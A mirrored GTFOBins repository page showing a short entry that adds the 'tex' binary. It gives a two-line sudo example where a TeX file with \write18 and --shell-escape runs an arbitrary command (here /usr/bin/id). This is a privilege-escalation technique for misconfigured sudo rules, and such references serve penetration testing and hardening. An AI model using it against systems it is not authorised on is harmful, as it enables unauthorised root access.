mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
8c08101fed
Add tex.
7 lines
280 B
Markdown
7 lines
280 B
Markdown
description: `tex` has a similar behaviour as [`pdftex`](/gtfobins/pdftex/)
|
|
functions:
|
|
sudo:
|
|
- code: |
|
|
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
|
tex -interaction=nonstopmode --shell-escape file.tex
|